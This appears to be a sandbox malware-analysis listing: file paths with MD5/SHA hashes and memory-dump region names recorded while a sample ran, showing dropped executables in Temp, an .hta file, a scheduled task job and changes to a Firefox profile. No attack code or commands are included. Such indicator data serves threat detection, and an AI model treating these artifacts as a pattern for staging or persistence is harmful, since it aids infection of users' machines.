SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/1496-92-0x0000000004C20000-0x0000000004C42000-memory.dmp

memory/1496-94-0x0000000005590000-0x00000000055F6000-memory.dmp

memory/1496-93-0x0000000005520000-0x0000000005586000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xvio2qr.g30.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3564-111-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1496-110-0x0000000005700000-0x0000000005A54000-memory.dmp

memory/1496-114-0x0000000005C10000-0x0000000005C5C000-memory.dmp

memory/1496-113-0x0000000005BC0000-0x0000000005BDE000-memory.dmp

memory/1496-119-0x0000000007500000-0x0000000007B7A000-memory.dmp

memory/1496-120-0x00000000060F0000-0x000000000610A000-memory.dmp

memory/3036-122-0x0000000000E60000-0x000000000131C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/1496-134-0x00000000070A0000-0x0000000007136000-memory.dmp

memory/1496-135-0x0000000007000000-0x0000000007022000-memory.dmp

memory/1496-136-0x0000000008130000-0x00000000086D4000-memory.dmp

memory/3948-153-0x0000000000040000-0x00000000004FC000-memory.dmp

memory/3948-157-0x0000000000040000-0x00000000004FC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3223d9d9283ab6dea8b043240c0abcec
SHA1 429c69d22519219d509e9edc7b0c0ae3a4db0680
SHA256 234e24e0e2393ef19df8b54fae996d457364c327f3ca44b5353a85a803e1d037
SHA512 f3816f23013386c5f7809adceeb7b8f6cbffaa688a5f3c1dd3645ec3a76d2fdeda522da0ee463008880bc862d96c7cf00152be4360de058c53e941edad149397

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/532-171-0x00000000059A0000-0x0000000005CF4000-memory.dmp

memory/532-173-0x0000000005FC0000-0x000000000600C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4b7a9eb731340efa705ae735724cda3b
SHA1 65586e6e5fb5c16799c0151832665de5206f39e7
SHA256 ba518835c112ae79de6180ee3aa05369b666ea21dac12f337aeb68e350b422c2
SHA512 432f2d632ba93a1b2ebfc8dd5ca3c1e6f99a837629efe0cd675a606b87962e52c6a09e60b60e52155b8bccfcb3cdfbda09da8c9defa8c0990cab2e14d97aa27c

memory/2940-185-0x0000000000E60000-0x000000000131C000-memory.dmp

C:\Temp\m9sy3Qpjo.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/3564-188-0x0000000000400000-0x0000000000840000-memory.dmp

memory/936-189-0x00000000057D0000-0x0000000005B24000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9931c49ac0ae2007c7a91de364d72928
SHA1 c0cb9757b6e30490852d922afba5147933c6f9f5
SHA256 5cf7e221e6c3a138ef0fcf64871b32b7dcd03ffd29255caf5c7adae733820744
SHA512 c7152caf2fe8220141b4a80eb2bfb0fe6d77ee8a0fc7b3208a67acf3c7c943e9cfc4441f489f2c2ef84e1c420243bfbca1aa4e56f623a8a483bddf7b5ea1b918

memory/936-200-0x0000000005E30000-0x0000000005E7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe

MD5 aa512b143958cbbe85c4fb41bb9ba3fa
SHA1 46459666d53ecb974385698aa8c306e49c1110ab
SHA256 8852cc3effc2d3698b05859fa1a18a758b26712263d38ea2de7ef138a31c2b26
SHA512 9ab9dbf0d0f7861bf18738d59f03b20f0552461857d4ff3f68d25cc4621f85aaab94050217a1a0c6d3c5a0adb09411a21a6541dcd1042b2a95413c65b2ec0333

memory/3564-212-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1200-215-0x0000000000250000-0x0000000000C3D000-memory.dmp

memory/916-224-0x0000000000E10000-0x00000000012CC000-memory.dmp

memory/916-227-0x0000000000E10000-0x00000000012CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/3988-245-0x0000000000350000-0x00000000003C8000-memory.dmp

memory/4684-247-0x0000000000400000-0x0000000000465000-memory.dmp

memory/4684-250-0x0000000000400000-0x0000000000465000-memory.dmp

memory/2940-251-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/3564-252-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1200-253-0x0000000000250000-0x0000000000C3D000-memory.dmp

memory/1200-254-0x0000000000250000-0x0000000000C3D000-memory.dmp

memory/3948-255-0x0000000000400000-0x000000000042F000-memory.dmp

memory/3948-257-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1200-256-0x0000000000250000-0x0000000000C3D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe

MD5 84ada09d9801547265d6589b50051295
SHA1 fa842424381715851e8d8d716afb27da31edd8c1
SHA256 a02496bfd7675a37043304198ee5b9efb075376e4ef1509fbbd5e83e190211f6
SHA512 4158f0c6409b7b11ee6023b5d295bc77ba3b82de54dd72de08c58bf2521f76ed52167b54395e35929dbb67f857205401eb262cf71c982d7e03823894f1f8037f

memory/628-274-0x0000000000A40000-0x0000000001673000-memory.dmp

memory/3948-276-0x0000000010000000-0x000000001001C000-memory.dmp

memory/2940-280-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/3564-282-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VYB52OGN\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe

MD5 5af71429b3b21c4ecb55d948a04f92a0
SHA1 6087f72c97eda7239f4e0631d07d64bfdb7c6ca0
SHA256 b1c0c3f611c1ee99465613f3045b154c43e1e0f94c1171c55b8c5ff2c4a9285b
SHA512 a27b3cef97bf2d58499df7ae1efafa34684f95b1b76e13c654ba9089ce3869e340e08daa12d83a1b1e2a891cd1a459d44b7a9b33e7593b9bcbb86efc9f17d827

memory/2688-299-0x0000000000DC0000-0x0000000001255000-memory.dmp

memory/2688-300-0x0000000000DC0000-0x0000000001255000-memory.dmp

memory/628-302-0x0000000000A40000-0x0000000001673000-memory.dmp

memory/2940-303-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/628-304-0x0000000000A40000-0x0000000001673000-memory.dmp

memory/2568-308-0x0000000000400000-0x000000000042F000-memory.dmp

memory/628-309-0x0000000000A40000-0x0000000001673000-memory.dmp

memory/3564-313-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe

MD5 30305d29528f3aca3b09636d919bd512
SHA1 4af875a29e249da70f2da3519334af8fd584c193
SHA256 015e79df6eee2266ce0fc395c2be08f750970312c9d0e1e6a7cff757ae63f43e
SHA512 a109d05f074d3407c09e66d9bcb2f8dd19811b73b6538b4f92edee17183f22d87faea63b1a09ed831c9c297e6fa729b61d0ad0bf81629f7fb7a08d0288cb04f4

memory/440-335-0x0000000000E40000-0x000000000114A000-memory.dmp

memory/2940-339-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/440-349-0x0000000000E40000-0x000000000114A000-memory.dmp

memory/3740-346-0x0000000000670000-0x0000000000B2C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe

MD5 afc954940e0fc5ca6bdf390e0033a01c
SHA1 aa0193bc48197c86a7ce3401be6607f0e052a319
SHA256 07446af5c75f3b25664b5471d74e5e213eaf7372b14289a98a2c5e8ba01391e8
SHA512 b1da9863d5427b7ca7a4a33b63bef12cb21faff28e440c053be4034759c94ffb167d9c56f188ff0d6572eebf014b8b4ad928ba7e34229603289f1c5541b80148

memory/3564-363-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4428-364-0x0000000000D60000-0x00000000013E8000-memory.dmp

memory/3740-367-0x0000000000670000-0x0000000000B2C000-memory.dmp

memory/4428-369-0x0000000000D60000-0x00000000013E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe

MD5 08552f5efe19801cc3fafe356dccd710
SHA1 29d2bff1b2ecc298c1cb0a95d3af0de7ee239af9
SHA256 16e6372a8712649b3c49c17f6d7103fe6f6a2c6dcf25a2d0759e43b33e2ec0b7
SHA512 17457315cdd235ed76d6f607e560784154b4f5a96ccc7ea1165cb62376600bf2a745afe6f4b722e2c3fb028df9b038f636730f2ec9709d78b15d719a7aad5e7d

memory/2940-397-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/1496-402-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/3564-403-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2916-416-0x0000000000400000-0x0000000000840000-memory.dmp

memory/3564-419-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\pending_pings\54f81209-6b25-4dc1-9c90-71f0333e6f21

MD5 909454f0bf09e142089f52027fb82c7d
SHA1 8530f31ba08c5e58c4c2cd6089ae2bd5cd03d60d
SHA256 292a7a734ad0b46e13acdb3adc57999be2be91c4307efaf918c9eed765aa1537
SHA512 141cf5a76d272bb05b6f1ab0bb9161e57a7d3950beab2eed765dddce3bc104810f2266d2a7db385b52de9e9b1fd4f4dbc056f883e8274d5602786883aabdb51e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\pending_pings\28afa70e-c077-4f8d-8324-fe31f69928c2

MD5 0461a7cdc8687b004eb406a02c0023d4
SHA1 8d0aa2a1e9f0f624ae8245d819a8065d713cc24e
SHA256 54c55f94da3de8e5341136eafc44f3c03fbec19ae03765d4526eda5ee990a06e
SHA512 6ef71f6f46d37452094458ee996d9ff06dde811c8e07d3d65e36e98656619a7a6829997a1fcea1d621845e0de77bb6a0b0bb8e188f0f6c0ec9f0511035724c65

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.tmp

MD5 97a0d19875109bc8242cfc1f65de00f5
SHA1 a32d71cd0794e62f188d911cb6780a19cb3a0926
SHA256 f2f07d5089c2bc1b880df1e99ae2b0e75aaa1f5bb1bd79a709b6b5cc3dcef86e
SHA512 e00399ef6e20ac221f9233e2e9736af1004ce18946654a83e81077099b13c7aff12dc14a9a6ad364fe053932ca4c2dd7738277aac9330cbdcac4d7baba4563df

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.tmp

MD5 ced34aafad02964d697e0377e31ab0d9
SHA1 7316060d26ce75b5b5ce17bd485cfb1225813e22
SHA256 8f1769307874bbdea0db5fe5fcadca5311cd441b514d032faf7ac009dc73fd85
SHA512 4bcd0f77c75cd2c85cf14b165a0e162f5fe0831eca0914167618ed0ca21b1f5580f273e3e9697f9e0e682bfd96a62c6738556ca01c16a7546a76327537cdd599

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\activity-stream.discovery_stream.json

MD5 1d81ada496d4badbcc357ae68d035448
SHA1 37bf33f7ad525893a93ee1608e56f618dec56ee2
SHA256 9aa2f7c8425fcf2ba2bc1985fdd3a3e271c2abf448bb3ec4280341d1f964dbf7
SHA512 e55de31d038bd85a1152b8f92da1f5738798066235c41ea6b724589a55284fab98546811e07ade7ba6ee8d6689b6bbfabb8e765928a292fdaee0b2d9c2a278be

C:\Windows\Tasks\Test Task17.job

MD5 9457e5e79adeab6780021b431c1fc062
SHA1 c0c83272ab5455d7ddad8476f8cbba018c2acb1f
SHA256 8e882626e7f955386b505edb2b2ee8cb8acfadbba9f7cbf1d4063c29108f7cf3
SHA512 03be6f5a7ee4d2a297ab14055e7deec514615218011ce88bde6fc3a42b487bba71b849b33bd7e06f3431e2d00e5497c213d16f36704c59b576199318c7605801

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\AlternateServices.bin

MD5 b654a7ac37270f8fd115865b407ac355
SHA1 98c8cd4384afd774040fcaf376cc7a37e67213d2
SHA256 0f8e83e4a1c0d315fe5b79e4c05e0d509586a0b9ad87a08606ba862b2047163f
SHA512 7c7a4a3c37b71bb5df3b2ab42ccbd32ba27dc3800f1cfcd5cd6bbc017c8916672de6c27ed546f15c2442040e19c5616998edff1518121ba11ab29f3fa531eb89

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.tmp

MD5 d9a028d187ab3fc1decbf82d631e381e
SHA1 31ef7eb3505bc65e77a7a3674533bce16ee3b019
SHA256 4bc0debeef18990131bdbc3016ad5b39f8a6029c39a943ab671a7f2cb266e95b
SHA512 23d8eded1cc7c730b230406e94258c27cdb52f178f36e27a578b063799604a1354b5e0dcaa642fb34c225f5eae3f881f875d51ada5ecf7fbc41cdbb42aea3d30

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\prefs.js

MD5 2f2a48a37b9f5d1d3a7c9b76487ca502
SHA1 ea09b244aa40bfbc9b8d2c75ef4f3533f2f9e0ae
SHA256 f7307f74e68b7f50269e1de9d8bb3319e3c2298e9abbd4394e6f31e1e55ff9ee
SHA512 f790148ae53e9aed8d89bb29508be869661081e46c7bfe8f415057406cfe7b41f56e1fb7f46b850999e5ddbb1b48d65cd0c15dd0f6254f5da6ddb295a07bdee0

C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe

MD5 37259000abc86b85dbb65366443ec3c1
SHA1 b6cf0ac13b56918992c9c6daa38e791a40f60f88
SHA256 681d6b115beeb234904a4235c87e9eecc6c25f09aab5cc20a36d58a5df35148c
SHA512 866e4e4d2af9aa8657fa84c1bfa552cbedcb151dd25d3dd7871ad6c27bba599e515515f4cbbf4610477867af8fb3a8f9090c5fcd28034ebb9db42f56eb900695

memory/3960-768-0x0000000000F40000-0x000000000138E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\prefs-1.js

MD5 f3e650fe068bcabd3afab23b59090542
SHA1 0f23293a651a78923887cc3a618b91bc274b75ec
SHA256 2d9907757294096de8bc9516f29cad392804348304f19f2fb678d1df242ec6ca
SHA512 14e855791cba571dcb6dd0e467f51e767590a637b289bd93a2bbf95acb06e32525c2c907d051a09384a5f78c5e1189ffee5cf45890e4a0932498a428660f1c8f

memory/3960-774-0x0000000000F40000-0x000000000138E000-memory.dmp

memory/3960-775-0x0000000000F40000-0x000000000138E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VYB52OGN\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\Desktop\YCL.lnk

MD5 bc9b6d9cb843554d83356013d2c0fdbe
SHA1 11d5875beb968ee61e25a0e61f2fc6afa48c976a
SHA256 2d0b2a13e4ed91a694975e231ca36f2bcb92dd9e1a219e8cf365db834121cb7a
SHA512 ce4a76a0f3df7bc8edbb7379a6a8b71e4487aea34b16f160bdd151c0adf67a710c677499983aba8af924fa93f705a6eeb3609add6ee7004ae9e3b381c2108ca7

memory/2940-847-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/2916-848-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2916-849-0x0000000000400000-0x0000000000840000-memory.dmp

memory/3960-857-0x0000000000F40000-0x000000000138E000-memory.dmp

memory/3960-860-0x0000000000F40000-0x000000000138E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/2940-875-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/6036-879-0x00000000006A0000-0x0000000000D8E000-memory.dmp

memory/2916-885-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\prefs.js

MD5 7c0b361f6ed003690e0626dab639b1e1
SHA1 7ffda9b5d515914ce1e43544f8c21e3f77dbf29e
SHA256 0a089cf242cf6e36fe2beae401258cedbe081ad86e2d329eb4266b45139873a1
SHA512 5cc64245a777319d24f3369a653173c76f345d851a75a28a2123f9fe1b9305573f447b6fc588c38457461ac758289c8057962bcb928f430b92b86fb43a29be7d

C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/5296-937-0x00000000007F0000-0x0000000000C91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\prefs.js

MD5 6a348c9d840842e477cfc0d16189db33
SHA1 50e4b0879a173c926e51d2bf5cafd6dab5df010b
SHA256 611dd8b9c5ef48fc49c5fa226a9b620f32dfd9a9f3f648e5097cb7dac6e8343d
SHA512 73a2a2eb45bdd77e4316d9a34928d8cd1689c55819944de4127ea8b7de38a286846dae9208d88611da222f6326ce0c220b26c171a09b8e6379eb079ea0660ebb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\cert9.db

MD5 6ae22d184f93d84885803179871d9d65
SHA1 458993128156491cf8efa220e75eb59e4daf991a
SHA256 6d7eb37bc76fdcdc37ebd7129ecda06eca627f90818a73a86650a54617f61c29
SHA512 94683faa72620b85f0a0df45572e0ee3f20dbe142ecf62f80b3410c06356f2d077f8c3396dd0b9362c5dea598c4c65ed28a75b0acf5ab9819992df992fcf97f0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\prefs.js

MD5 06a3805f78908f6baf4fd494b3574582
SHA1 a38a5aad304dcd3e935647af51ab3d0d3886760a
SHA256 34418eb44b7cb9fd5341c4b2295c6641eeeace9f9fd7830e0ac26eb3a8804e89
SHA512 49d5c8cfd7f9bce43f443333a07a47fb8e91f164c7bd90be2c94d86431110a5c140dfa1f67239d67a7cd678d0fd7fd2f980a13039d8fae2020f477f6728504d3

memory/6036-1013-0x00000000006A0000-0x0000000000D8E000-memory.dmp

memory/2940-1012-0x0000000000E60000-0x000000000131C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/5796-1028-0x0000000000B80000-0x0000000000BE0000-memory.dmp

memory/5296-1034-0x00000000007F0000-0x0000000000C91000-memory.dmp

memory/6024-1032-0x0000000000400000-0x0000000000429000-memory.dmp

memory/6024-1030-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2916-1035-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/2484-1052-0x00000276FB500000-0x00000276FB512000-memory.dmp

memory/2484-1053-0x00000276FD060000-0x00000276FD070000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/1212-1088-0x0000000000230000-0x00000000002A0000-memory.dmp

memory/3340-1091-0x0000000000400000-0x0000000000466000-memory.dmp

memory/3340-1090-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2940-1092-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/3340-1093-0x0000000000400000-0x0000000000466000-memory.dmp

memory/3340-1095-0x0000000003700000-0x0000000003705000-memory.dmp

memory/3340-1094-0x0000000003700000-0x0000000003705000-memory.dmp

memory/2916-1099-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/4584-1114-0x0000000000290000-0x000000000072B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

memory/5828-1137-0x00000220223C0000-0x00000220223E2000-memory.dmp

memory/2940-1138-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/2484-1139-0x00000276FDFD0000-0x00000276FE4F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe

MD5 35ed5fa7bd91bb892c13551512cf2062
SHA1 20a1fa4d9de4fe1a5ad6f7cdd63c1f2dee34d12c
SHA256 1e6929de62071a495e46a9d1afcdf6ec1486867a220457aacfdfa5a6b6ff5df4
SHA512 6b8acda217f82bd4b2519bc089f05cfbdff654b2556db378cf8344972de33d63c11f4713b2b342b3cb6e333c59517448995c33d739f72fdf00e8a81d46bd8483

memory/2916-1171-0x0000000000400000-0x0000000000840000-memory.dmp

memory/6024-1172-0x0000000000400000-0x0000000000429000-memory.dmp

memory/6024-1173-0x0000000000400000-0x0000000000429000-memory.dmp

C:\ProgramData\pzmgl\2n7glx

